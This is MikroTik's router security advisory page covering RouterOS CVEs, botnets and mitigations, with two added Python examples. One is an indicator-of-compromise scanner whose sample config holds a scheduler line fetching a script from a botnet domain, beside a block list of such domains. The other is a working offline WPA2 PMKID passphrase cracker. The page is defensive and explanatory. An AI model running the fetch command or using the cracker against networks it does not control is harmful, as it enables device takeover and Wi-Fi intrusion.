Security

Responsible disclosure of discovered vulnerabilities
It is important to us at MikroTik that our customers can feel safe and secure when using our products, and we constantly strive for the highest possible security and quality. Despite this, an issue affecting the security of our devices could still be discovered. If you have found such a security flaw, we would like to hear about it so that we can correct the problem as soon as possible. We are grateful to anyone who takes the time to report the weaknesses they discover, provided they do so in accordance with our responsible disclosure guidelines.
CVE-2024-54772
Feb 18, 2025 | Security

Issue Summary

A vulnerability has been identified in the WinBox service: the response size differs between login attempts with valid and invalid usernames, which lets an attacker confirm whether a user account exists by brute forcing the login process. In other words, by examining the response to a login attempt, an attacker can deduce whether that user exists on the device. Even when a username is confirmed, the password still has to be guessed.

Affected Versions

RouterOS versions prior to 6.49.18 and 7.18.

Recommended Actions

  • Update RouterOS – Upgrade to 6.49.18, 7.18, or a newer version to patch the vulnerability.
  • Monitor for unusual login attempts – Review router logs for suspicious authentication activity and take action accordingly.

Mitigation strategies for devices that cannot be updated immediately

Restrict WinBox access. Firewall the WinBox port (TCP 8291 by default) on public interfaces and untrusted networks. Limit connections to trusted IP addresses using the “IP → Services” menu to specify allowed sources (e.g., your LAN and trusted public IPs).

Use additional protection methods if access from untrusted networks is necessary

Port Knocking: https://help.mikrotik.com/docs/spaces/ROS/pages/154042369/Port+knocking

Brute-Force Prevention: https://help.mikrotik.com/docs/spaces/ROS/pages/268337176/Bruteforce+prevention

Secure MAC-WinBox Connections: Restrict MAC-WinBox connections to trusted interfaces using:

/tool mac-server mac-winbox set allowed-interface-list=<trusted-interface-list>

If your device is running the default configuration with the firewall enabled, the WinBox service is already limited to LAN access. In that case the only remaining attack vector is a threat inside the local network.

For more details, please see:

https://help.mikrotik.com/docs/spaces/ROS/pages/167706788/Default+configurations

CVE-2023-30799
Jul 27, 2023 | Security

A new CVE has been published describing a policy elevation issue: a logged-in administrator with the “policy” permission (able to grant additional permissions to any user on the router) is also able to send crafted configuration commands that are normally exchanged only internally between router software components and are rejected when sent by a user. This can be used as a stepping stone to execute arbitrary code on the router, giving the connected user control of the underlying operating system on which RouterOS runs.

To use this exploit, an attacker needs administrative access to RouterOS, i.e. a known username and password, as well as a way to connect (no firewall blocking the management interface).

This is not the only way in which a logged-in administrator with such a high access level (as required for this exploit) can compromise the router. Other possibilities include saving, modifying and restoring a configuration backup; installing additional software packages; and using another device on the local network to perform a network reinstall of the router to a known vulnerable version.

Thus, if a malicious party already has full admin login to a router, this exploit provides little additional advantage. It is extremely important to make sure that the configuration interface of the router is protected by a strong password and is not accessible to untrusted parties.

Suggested course of action:

In short, a RouterOS admin with full rights can already do anything in RouterOS and has full control over all configuration, but should not be able to run other code or inject files into the RouterOS subsystem. This issue is fixed in all RouterOS releases available on our download page (v7.7 and v6.49.7 and newer).

CVE-2023-32154
May 19, 2023 | Security

On 10/05/2023 (May 10th, 2023) MikroTik received information about a new vulnerability, which was assigned the ID CVE-2023-32154. The report stated that the vendor (MikroTik) had been contacted in December, but we found no record of such communication. The original report also says that the vendor was informed in person at an event in Toronto, where MikroTik was not present in any capacity.

What this issue affects: The issue affects devices running MikroTik RouterOS versions v6.xx and v7.xx with enabled IPv6 advertisement receiver functionality. You are only affected if one of the below settings is applied:

ipv6/settings/ set accept-router-advertisements=yes

or

ipv6/settings/set forward=no accept-router-advertisements=yes-if-forwarding-disabled

If neither of the above settings is configured as in the examples, you are not affected. Note that the vulnerable setting combination is not part of the default configuration and is rarely used.

What this issue can cause: This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Mikrotik RouterOS. Authentication is not required to exploit this vulnerability.

Recommended course of action: disable acceptance of IPv6 router advertisements, or upgrade to RouterOS 7.9.1, 6.49.8, 6.48.7 or 7.10beta8 (all already released), or of course any newer version.

Mēris botnet
Sep 15, 2021 | Security

In early September 2021 QRATOR labs published an article about a new wave of DDoS attacks, which are originating from a botnet involving MikroTik devices.

As far as we have seen, these attacks use the same routers that were compromised in 2018, when MikroTik RouterOS had a vulnerability that was quickly patched.

There is no new vulnerability in RouterOS and there is no malware hiding inside the RouterOS filesystem even on the affected devices. The attacker is reconfiguring RouterOS devices for remote access, using commands and features of RouterOS itself.

Unfortunately, closing the old vulnerability does not immediately protect these routers. If somebody obtained your password in 2018, an upgrade alone will not help. You must also change the password, re-check that your firewall does not allow remote access to unknown parties, and look for scripts that you did not create.

We have tried to reach all users of RouterOS about this, but many of them have never been in contact with MikroTik and are not actively monitoring their devices. We are working on other solutions too.

There are no new vulnerabilities in these devices. RouterOS has been recently independently audited by several third parties.

Best course of action:

  • Keep your MikroTik device up to date with regular upgrades.
  • Do not open access to your device from the internet side to everyone, if you need remote access, only open a secure VPN service, like IPsec.
  • Use a strong password and even if you do, change it now!
  • Don’t assume your local network can be trusted. Malware can attempt to connect to your router if you have a weak password or no password.
  • Inspect your RouterOS configuration for unknown settings (see below).

In collaboration with independent security researchers, we have found that there is malware that attempts to reconfigure your MikroTik device from a Windows computer inside your network. This is why it is important to set a better password now (to avoid passwordless login or a dictionary attack by this malware) and to keep your MikroTik router upgraded (since this malware also attempts to exploit the mentioned CVE-2018-14847 vulnerability, which has long been fixed).

Configuration to look out for and remove:

  • System -> Scheduler rules that execute a Fetch script. Remove these.
  • IP -> Socks proxy. If you don’t use this feature or don’t know what it does, it must be disabled.
  • L2TP client named “lvpn” or any L2TP client that you don’t recognize.
  • Input firewall rule that allows access for port 5678.

You can also work with your ISPs to block the following addresses, which these malicious scripts are connecting to:

Block these tunnel endpoint domains:

  • *.eeongous.com
  • *.leappoach.info
  • *.mythtime.xyz

Block these script download domains:

  • 1abcnews.xyz
  • 1awesome.net
  • 7standby.com
  • audiomain.website
  • bestony.club
  • ciskotik.com
  • cloudsond.me
  • dartspeak.xyz
  • fanmusic.xyz
  • gamedate.xyz
  • globalmoby.xyz
  • hitsmoby.com
  • massgames.space
  • mobstore.xyz
  • motinkon.com
  • my1story.xyz
  • myfrance.xyz
  • phonemus.net
  • portgame.website
  • senourth.com
  • sitestory.xyz
  • spacewb.tech
  • specialword.xyz
  • spgames.site
  • strtbiz.site
  • takebad1.com
  • tryphptoday.com
  • wchampmuse.pw
  • weirdgames.info
  • widechanges.best
  • zancetom.com

As reported by others on the internet, these domains are also used by the botnet:

  • bestmade.xyz
  • gamesone.xyz
  • mobigifs.xyz
  • myphotos.xyz
  • onlinegt.xyz
  • picsgifs.xyz

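The configuration indicators and domain lists above can be checked mechanically against an `/export` of the router. The following is an added example (not MikroTik's code) that parses the export text, reports the four configuration indicators and flags any hostname in the export that matches one of the listed domains, treating `*.example` as the domain itself or any subdomain. The export text embedded in it is constructed to show each indicator once; it is not a real Mēris configuration. Pass the names of L2TP clients you created yourself in `known_vpn_clients` so they are not reported.

```python
"""Scan a RouterOS `/export` dump for the Mēris indicators in the advisory.

Added example, not MikroTik code. Save `/export` output to a file on the
router (or run `/export` over SSH) and feed the text to audit().
SAMPLE_EXPORT is constructed for illustration only.
"""
import re

IOC_DOMAINS = {
    # tunnel endpoints (wildcards) and script download domains from the advisory
    "*.eeongous.com", "*.leappoach.info", "*.mythtime.xyz",
    "1abcnews.xyz", "1awesome.net", "7standby.com", "audiomain.website",
    "bestony.club", "ciskotik.com", "cloudsond.me", "dartspeak.xyz",
    "fanmusic.xyz", "gamedate.xyz", "globalmoby.xyz", "hitsmoby.com",
    "massgames.space", "mobstore.xyz", "motinkon.com", "my1story.xyz",
    "myfrance.xyz", "phonemus.net", "portgame.website", "senourth.com",
    "sitestory.xyz", "spacewb.tech", "specialword.xyz", "spgames.site",
    "strtbiz.site", "takebad1.com", "tryphptoday.com", "wchampmuse.pw",
    "weirdgames.info", "widechanges.best", "zancetom.com",
    "bestmade.xyz", "gamesone.xyz", "mobigifs.xyz", "myphotos.xyz",
    "onlinegt.xyz", "picsgifs.xyz",
}

# Constructed sample export (not from a real device); one hit per indicator.
SAMPLE_EXPORT = """\
# constructed sample, not a real configuration
/interface l2tp-client
add connect-to=vpn.eeongous.com name=lvpn user=u1 password=p1
/ip socks
set enabled=yes port=5678
/ip firewall filter
add action=accept chain=input dst-port=5678 protocol=tcp
add action=accept chain=input connection-state=established,related
/system scheduler
add interval=10m name=U6 on-event="/tool fetch url=http://7standby.com/poll/1 mode=http dst-path=x.rsc" policy=read,write,policy,test
add interval=1d name=backup on-event="/system backup save name=nightly" policy=read,write
"""

KV_RE = re.compile(r'([\w-]+)=("(?:[^"\\]|\\.)*"|\S+)')
HOST_RE = re.compile(r"(?:https?://|connect-to=)([A-Za-z0-9.-]+)")


def parse_export(text):
    """Return [(section, verb, {key: value}), ...] for each add/set line."""
    entries, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):          # e.g. "/system scheduler"
            section = line
            continue
        verb, _, rest = line.partition(" ")
        params = {k: v.strip('"') for k, v in KV_RE.findall(rest)}
        entries.append((section, verb, params))
    return entries


def host_matches(host, pattern):
    """IOC match; '*.example' means the domain itself or any subdomain."""
    host = host.lower().rstrip(".")
    if pattern.startswith("*."):
        base = pattern[2:]
        return host == base or host.endswith("." + base)
    return host == pattern


def audit(text, known_vpn_clients=()):
    """Return human-readable findings for the advisory's indicators."""
    findings = []
    for section, verb, p in parse_export(text):
        if section == "/system scheduler" and "fetch" in p.get("on-event", ""):
            findings.append(f"scheduler '{p.get('name')}' runs fetch: {p['on-event']}")
        elif section == "/ip socks" and p.get("enabled") == "yes":
            findings.append(f"SOCKS proxy enabled on port {p.get('port')}")
        elif section == "/interface l2tp-client" and p.get("name") not in known_vpn_clients:
            findings.append(f"unknown L2TP client '{p.get('name')}' to {p.get('connect-to')}")
        elif (section == "/ip firewall filter" and p.get("chain") == "input"
              and p.get("action") == "accept"
              and "5678" in p.get("dst-port", "").split(",")):  # exact port list only
            findings.append("input rule accepts port 5678")
    for host in HOST_RE.findall(text):
        hits = [d for d in IOC_DOMAINS if host_matches(host, d)]
        if hits:
            findings.append(f"reference to Mēris domain {host} (matches {hits[0]})")
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_EXPORT):
        print("-", f)
```

The port check matches an explicit port list only; a rule with a range such as `dst-port=5000-6000` would also expose 5678 and is worth reviewing by hand. The same inspection applies to the “Export” step recommended in the 2018 Winbox advisory further down this page.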
Fragattacks
Jun 2, 2021 | Security

In the beginning of May 2021, a security research group from Belgium published a set of vulnerabilities they call “Frag Attacks” (from Fragmentation Attacks), which affect all modern Wi-Fi security protocols. Not all of the published issues affect MikroTik products, but those found to potentially affect RouterOS have been fixed in all currently released RouterOS versions.

The affected vulnerabilities are: CVE-2020-24587, CVE-2020-24588, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147.

All fixes are published already, in the following versions:

  • v6.47.10 [long-term]
  • v6.48.3 [stable]
  • v7.1beta6 [beta]
Upgraded package signatures
Mar 10, 2021 | Security

The RouterOS package signing procedure has been upgraded to use new algorithms and state of the art security hardware. It will also make it possible to verify the integrity of existing installations.

The new updated package signing procedure provides additional security to prevent installation of malicious software.

Best security practices:

  • Keep RouterOS updated to the latest version
  • Secure your devices with firewall and limit access to specific services
  • Do not use 3rd party sites for RouterOS and other MikroTik software downloads
  • Use Netinstall, whenever there is doubt about previous history of software installed on the router, or upgrade router with packages manually downloaded from mikrotik.com

The new updated signing procedure has been implemented in all of the RouterOS release channels starting from:

  • 6.47.9 [long-term]
  • 6.48.1 [stable]
  • 6.49beta11 [testing]
  • 7.1beta4 [development]
CVE-2019-3981
Jan 15, 2020 | Security

Summary

Tenable has published a potential vulnerability in older RouterOS versions where an attacker can retrieve the password hash of a RouterOS username via a complex man-in-the-middle attack over port 8291. The attacker must be able to intercept a valid RouterOS user login attempt, so they must be located on the same network as the legitimate user.

Course of action

This issue only affects old RouterOS versions released before June 2019.

  1. Using a strong password ensures the password hash cannot be easily cracked, even if it is retrieved.
  2. MikroTik has already forced the use of Winbox encryption since RouterOS v6.45.x (June 2019).
  3. Make sure your device is not accessible from untrusted networks or use a secure VPN to the router, if you must access it from public spaces. Protect your device using our suggestions and use a recent RouterOS release.
DNS cache poisoning vulnerability
Oct 28, 2019 | Security

Tenable has identified a vulnerability in RouterOS DNS implementation. RouterOS 6.45.6 and below is vulnerable to unauthenticated remote DNS cache poisoning via Winbox. The router is impacted even when DNS is not enabled.

One possible attack vector is via Winbox on port 8291, if this port is open to untrusted networks. The resolver can be reached via Winbox by sending messages to the system resolver. If Winbox access is enabled from untrusted networks, an attacker on the internet can trigger a DNS request from the router, which allows the attacker to make arbitrary requests, find the router’s internal address (router.lan), or figure out what is already cached.

As usual, we recommend to protect your router administration interface with VPN and firewall.

The issue is fixed in RouterOS versions:

  • 6.45.7 [stable]
  • 6.44.6 [long-term]
  • 6.46beta59 [testing]

With the following changelog entry:

  • !) security - fixed improper handling of DNS responses (CVE-2019-3978, CVE-2019-3979);

For more details, please see original report by Jacob Baines (Tenable).

Package validation and upgrade vulnerability
Oct 28, 2019 | Security

Tenable has identified a couple of issues with the RouterOS packaging and upgrade systems. The upgrade system used by RouterOS 6.45.5 and below is vulnerable to man-in-the-middle attacks and insufficient package validation. An attacker can abuse these vulnerabilities to downgrade a router’s installed RouterOS version, possibly locking the user out of the system or disabling it.

  • Issue #1: Appending unsigned data to package and directory traversal (CVE-2019-3976). An attacker could create custom packages and give them to the victim, to modify RouterOS directory structure.
  • Issue #2: Upgrade is vulnerable to man in the middle attacks (CVE-2019-3977). An attacker could trick the victim to get packages from a different upgrade server.

Both issues are fixed in released RouterOS versions in all release chains:

  • 6.45.7 [stable]
  • 6.44.6 [long-term]
  • 6.46beta59 [testing]

With the following changelog entries:

  • !) package - accept only packages with original filenames (CVE-2019-3976);
  • !) package - improved package signature verification (CVE-2019-3977);
CVE-2019-11477, CVE-2019-11478, CVE-2019-11479
Jun 20, 2019 | Security

Summary

Netflix has identified several TCP networking vulnerabilities in the Linux kernel that is used in RouterOS. The vulnerabilities can trigger a denial of service if the RouterOS system is attacked from an insufficiently protected network interface (port). A firewall can protect against the issue.

MikroTik has already applied the necessary patches: the fix is included in RouterOS 6.45.1 and 6.44.5, which are available on our webpage.

Course of action

Make sure your device is not accessible from untrusted networks, protect it using our suggestions, and upgrade to the latest RouterOS release.

More details

The original article.

CVE-2018-19298 CVE-2018-19299 IPv6 resource exhaustion
Apr 4, 2019 | Security

Summary

RouterOS contained several IPv6 related resource exhaustion issues, that have now been fixed, taking care of the above-mentioned CVE entries.

The first issue caused the device to reboot when traffic to a large number of different destination addresses was routed; the reboot was triggered by the watchdog timer because the device was overloaded and stopped responding. After that reboot was fixed, another issue caused memory to fill up, because the IPv6 route cache could grow larger than the available RAM. This was also fixed, by calculating the cache size automatically from the available memory. Both fixes are already released in the RouterOS versions published in April 2019 (all release chains: RouterOS v6.44.2, RouterOS v6.45beta23 and RouterOS v6.43.14).

Here are the relevant changelog entries:

  • ipv6 - fixed soft lockup when forwarding IPv6 packets
  • ipv6 - fixed soft lockup when processing large IPv6 Neighbor table
  • ipv6 - adjust IPv6 route cache max size based on total RAM memory

Who is affected

By default, the IPv6 functionality in RouterOS is disabled, so such systems are not affected. Only users who have manually enabled and configured IPv6 can be affected, and only if their IPv6 address is reachable from untrusted networks.

How to remedy

Upgrade to any RouterOS version released after April 1st, 2019.

Acknowledgements

  • CVE-2018-19298, CVE-2018-19299: Marek Isalski
CVE-2019-3924 Dude agent vulnerability
Feb 22, 2019 | Security

On February 21, Tenable published a new CVE describing a vulnerability which allows an attacker to proxy a TCP/UDP request through the router’s Winbox port, if it is open to the internet. Tenable had previously contacted MikroTik about this issue, so a fix had already been released on February 11, 2019 in all RouterOS release channels.

The issue does not affect RouterBOARD devices with the default configuration, if the “Firewall router” checkbox was left enabled. The issue DOES NOT pose any risk to the router itself: the file system is not vulnerable, and the issue only allows redirection of connections if the port is open. The device itself is safe.

The issue is fixed in:

  • 6.43.12 (2019-02-11 14:39)
  • 6.44beta75 (2019-02-11 15:26)
  • 6.42.12 (2019-02-12 11:46)

As always, MikroTik urges all users to keep their devices up to date, to be protected against all known vulnerabilities, and to make sure their routers’ administrative ports are firewalled from untrusted networks. The “ip services” menu, where you can protect the “winbox” service, also affects the “dude agent” service, so if you have limited access with this menu, it also protects you from this issue.

New Exploit for MikroTik Router WinBox Vulnerability
Oct 9, 2018 | Security

A cybersecurity researcher from Tenable Research has released a new proof-of-concept (PoC) RCE attack for an old directory traversal vulnerability that was found and patched within a day of its discovery in April this year. The new attack method found by Tenable Research exploits the same vulnerability, but takes it one step further.

Since the original Winbox issue, identified as CVE-2018-14847, was already patched back in April, we urge all MikroTik users to upgrade their devices to any recently released version, and as a precaution also change their passwords and inspect their configuration for unknown entries.

Please note that all of the recently released CVE entries have been fixed in RouterOS for several months, none of the newly discussed issues affect current products. More information from Tenable. Original post about the fixed issue, later called CVE-2018-14847, including more suggestions.

In short:

  • Regardless of the version used, RouterOS devices with the default firewall enabled are not vulnerable
  • If the user has manually disabled the default firewall, the device might be vulnerable to CVE-2018-14847, which was patched in April
  • The newly revealed exploit relies on the above, already patched issue
  • Please upgrade, change password and inspect configuration for irregularities
CVE-2018-115X issues discovered by Tenable
Aug 23, 2018 | Security

MikroTik was contacted by Tenable Inc., who had discovered several issues in the RouterOS web server. The issues only affect authenticated users, meaning that to exploit them there must be a known username and password on the device. Your data, access to the system and configuration are not at risk. All of the issues below only allow an authenticated user (even a read-only user) to cause the www service to crash. Tenable has assigned CVE numbers to these issues.

  • CVE-2018-1156: An authenticated user can trigger a stack buffer overflow.
  • CVE-2018-1157: File upload memory exhaustion. An authenticated user can cause the www binary to consume all memory.
  • CVE-2018-1158: Recursive JSON parsing stack exhaustion, which could allow an authenticated user to cause crash of the www service.
  • CVE-2018-1159: www memory corruption, if connections are initiated and not properly cleaned up then a heap corruption occurs in www.

All of the above issues are fixed in the following RouterOS releases: 6.42.7, 6.40.9, 6.43

WPA2 preshared key brute force attack
Aug 9, 2018 | Security

It has come to our attention that a new brute force attack against the WPA2 preshared key, based on the PMKID, has been published.

This attack is in fact a brute force attack on the WPA2 preshared key. It is considered effective because it can be performed offline, without attempting to connect to the AP, based on a single sniffed frame from a valid key exchange.

This problem is not a vulnerability, but a way how wireless AP password can be guessed in an easier way.

To mitigate this type of attack, use a strong password that is hard to brute force. Using an access-list also helps to protect your network, because the attacker’s station must first be accepted by the AP before a key exchange is started.

To eliminate possibility of this attack entirely you can use WPA-PSK (do not forget to use aes-ccm encryption!). WPA-PSK does not include the field that is used to verify the password in this attack.

We have also added the option to disable sending PMKID in handshake message 1 in WPA2-PSK. Disabling it will also protect your network against this attack. This option is available in RouterOS versions 6.40.9, 6.42.7 and 6.43 (from rc56).
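
To make concrete why this attack works offline, here is an added example (not MikroTik's code). In WPA2-PSK the pairwise master key (PMK) is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes), and the PMKID that the AP may include in message 1 of the four-way handshake is the first 16 bytes of HMAC-SHA1(PMK, "PMK Name" || AP MAC || station MAC). Everything except the passphrase is in the captured frame, so candidate passphrases can be tested without contacting the AP again. The SSID, MAC addresses, wordlist and the key-data bytes are constructed for the example.

```python
"""Why the PMKID attack is an offline brute force of the WPA2 preshared key.

Added example, not MikroTik code. Shows (1) the key derivation, (2) where
the PMKID sits in the EAPOL message 1 key data, and (3) an offline guess
loop. The constructed scenario uses a weak and a strong passphrase.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK key derivation; the 4096 PBKDF2 rounds are the per-guess cost."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA)."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def extract_pmkid(eapol_key_data: bytes):
    """Pull the PMKID out of the RSN key-data KDEs of EAPOL message 1.

    Each KDE is: type 0xdd, length, OUI 00-0F-AC, data type (4 = PMKID), data.
    Returns None when no PMKID KDE is present (the AP does not have to send one,
    which is exactly what the RouterOS option described above turns off).
    """
    i = 0
    while i + 2 <= len(eapol_key_data):
        kde_type, length = eapol_key_data[i], eapol_key_data[i + 1]
        body = eapol_key_data[i + 2:i + 2 + length]
        if kde_type == 0xDD and length >= 20 and body[:4] == b"\x00\x0f\xac\x04":
            return body[4:20]
        i += 2 + length
    return None


def crack_pmkid(captured_pmkid, ssid, ap_mac, sta_mac, candidates):
    """Offline guess: return the first candidate whose PMKID matches, else None."""
    for pw in candidates:
        guess = pmkid(pmk_from_passphrase(pw, ssid), ap_mac, sta_mac)
        if hmac.compare_digest(guess, captured_pmkid):
            return pw
    return None


# Constructed scenario (made-up SSID, locally administered MACs, toy wordlist).
SSID = "Office-WLAN"
AP_MAC = bytes.fromhex("020000000001")
STA_MAC = bytes.fromhex("020000000002")
WORDLIST = ["12345678", "password", "password123", "mikrotik", "letmein1"]


def message1_key_data(passphrase: str) -> bytes:
    """Build the key-data field an AP would send: a single PMKID KDE (constructed)."""
    pid = pmkid(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC)
    return b"\xdd\x14" + b"\x00\x0f\xac\x04" + pid


def demo(passphrase: str):
    """Capture M1 key data once, then guess offline from WORDLIST."""
    captured = extract_pmkid(message1_key_data(passphrase))
    return crack_pmkid(captured, SSID, AP_MAC, STA_MAC, WORDLIST)


if __name__ == "__main__":
    print("weak passphrase   ->", demo("password123"))
    print("strong passphrase ->", demo("9k#Lq2!vR8pZ&wX4mT7"))
```

Two practical points follow from the code: the PBKDF2 salt is the SSID, so rainbow tables only help against common SSIDs, and a long random passphrase is never found because the cost per guess (4096 HMAC rounds) makes an exhaustive search infeasible, while a wordlist passphrase falls in milliseconds.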

Winbox vulnerability
Jul 12, 2018 | Security

This post summarises the Winbox server vulnerability in RouterOS, discovered and fixed in RouterOS on April 23, 2018. Note that although Winbox was used as the point of attack, the vulnerability was in RouterOS. This issue was later assigned the universal identifier CVE-2018-14847.

How it works: The vulnerability allowed a special tool to connect to the Winbox port, and request the system user database file.

Versions affected:

  • Affected all bugfix releases from 6.30.1 to 6.40.7, fixed in 6.40.8 on 2018-Apr-23
  • Affected all current releases from 6.29 to 6.42, fixed in 6.42.1 on 2018-Apr-23
  • Affected all RC releases from 6.29rc1 to 6.43rc3, fixed in 6.43rc4 on 2018-Apr-23

Am I affected? There is currently no sure way to tell. If your Winbox port is open to untrusted networks, assume that you are affected: upgrade, change the password and add a firewall according to our guidelines. Make sure that you change the password after the upgrade. The log may show an unsuccessful login attempt followed by a successful login from an unknown IP address.

What to do:

  1. Upgrade Winbox and RouterOS.
  2. Change your passwords.
  3. Firewall the Winbox port from the public interface and from untrusted networks. It is best if you only allow known IP addresses to connect to any service on your router, not just Winbox; we suggest making this common practice. As an alternative, possibly easier, use the “IP -> Services” menu to specify “Allowed From” addresses. Include your LAN and the public IP that you will be accessing the device from.
  4. Use the “Export” command to see your whole configuration and inspect it for any abnormalities, such as unknown SOCKS proxy settings and scripts.

Web service vulnerability
May 30, 2018 | Security

This post summarizes the facts around the www service vulnerability in RouterOS which was published by Wikileaks as part of the Vault 7 document release. The vulnerability affected the RouterOS webfig configuration interface, if no firewall was put in place to protect it. MikroTik fixed the vulnerability in the following RouterOS releases:

  • 6.37.5 in the Bugfix channel
  • 6.38.5 in the Current channel

Both were released on 2017-Mar-09.

The vulnerability in question was later exploited by several malicious tools and affected users of RouterOS who had not upgraded RouterOS above the mentioned versions, and had opened the www service port (TCP port 80) to untrusted networks.

VPNfilter

MikroTik was informed by Cisco Talos research group on May 22nd of 2018, that a malicious tool was found on several manufacturer devices, including devices made by MikroTik. We are highly certain that this malware was installed on these devices through the above mentioned vulnerability in the www service.

Simply upgrading RouterOS deletes the malware and any other 3rd party files, and closes the vulnerability. Upgrading RouterOS takes a few clicks and only a minute. To be safe against any kind of attack in the future, make sure you secure access to your devices.

If you were running a RouterOS version released before March 2017 (6.37.5 in the Bugfix channel, or 6.38.5 in the Current channel) and had allowed access to the device web interface from the internet, we suggest the following steps:

  1. Upgrade RouterOS
  2. Change your password
  3. Protect your device according to our official guide

The name VPNfilter is only a code name of the malware that was found (more specifically, a fake executable name). The modus operandi of this tool has no relation to VPN tunnels.

Hajime botnet

It has come to our attention that a rogue botnet is currently scanning random public IP addresses to find open Winbox (8291) and WWW (80) ports, to exploit the above described vulnerability. Since all RouterOS devices offer free upgrades with just two clicks, we urge you to upgrade your devices with the “Check for updates” button, if you haven’t done so within the last year.

Your devices are safe if port 80 is firewalled, or if you have upgraded to v6.38.5 or newer. If you are using our home access point devices with the default configuration, they are firewalled from the factory and you should also be safe, but please upgrade nevertheless.

FAQ:

What is affected?

- Webfig with standard port 80 and no firewall rules
- Winbox has nothing to do with the vulnerability, Winbox port is only used by the scanners to identify MikroTik brand devices. Then it proceeds to exploit Webfig through port 80.

Am I safe?

- If you upgraded your router in the last ~12 months, you are safe
- If you had “ip service” “www” disabled: you are safe
- If you had firewall configured for port “80”: you are safe
- If you only had Hotspot in your LAN, but Webfig was not available: you are safe
- If you only had User Manager in your LAN, but Webfig was not available: you are safe
- If you had a non-standard Winbox port before this: you are safe from the scan, but not from the infection
- If you had “winbox” disabled: you are safe from the scan, not from the infection

- If you had “ip service” “allowed-from” set to specific network: you are safe if that network was not infected.
- If you had “Webfig” visible to LAN network, you could be infected by an infected device in your LAN.

How to detect and cure?

- Upgrading to v6.38.5 or newer will remove the bad files, stop the infection and prevent anything similar in the future.
- If you upgrade the device and still see attempts to access Telnet from your network, run Tool/Torch to find the source of the traffic. It will not be the router itself, but another device in the local network which is also affected and requires an upgrade.

